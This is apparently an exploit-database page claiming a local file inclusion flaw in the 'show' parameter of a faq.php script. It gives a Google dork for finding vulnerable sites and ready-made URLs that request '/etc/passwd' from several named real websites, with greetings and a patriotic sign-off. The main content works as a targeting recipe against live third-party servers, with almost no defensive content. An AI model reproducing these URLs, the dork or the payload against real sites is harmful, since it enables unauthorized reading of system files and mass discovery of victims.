Hacker Factor Local File Inclusion Vulnerability

2020.04.03

TrazeR (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#################################################################################
# Exploit Title: Hacker Factor Local File Inclusion Vulnerability
# Author : TrazeR  
# Google Dork : intext:"Copyright 2012-2020 Hacker Factor" inurl:faq.php?
# Tested on : W10 
# Date : 01.04.2020
# Blog : https://www.trazer.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~# Tutorial :

[+] Dorking İn Google Or Other Search Enggine
[+] Parameter 'show' is vulnerable
[+] faq.php?show= Add Payload
Greet'Zzz: Security Research Team And 
Sample:
 
https://fotoforensics.com/faq.php?show=/etc/passwd&c=guidelines    

https://lab.fotoforensics.com/faq.php?show=/etc/passwd&c=guidelines

http://www.hackerfactor.com/blog/faq.php?show=/etc/passwd&c=guidelines 

http://neutralcharge.info/faq.php?show=/etc/passwd&c=guidelines  

http://neutralcharge.net/faq.php?show=/etc/passwd&c=guidelines

Greet'Zzz: Security Research Team And & Samili Asım & Katakulli & Yusuf islam & CihangirPaşa 

BiZ Bize Yeteriz 

NE MUTLU TÜRKÜM DİYENE !

References:

https://www.trazer.org/2020/04/hacker-factor-local-file-inclusion.html

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Hacker Factor Local File Inclusion Vulnerability

Dork: intext:"Copyright 2012-2020 Hacker Factor" inurl:faq.php?

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.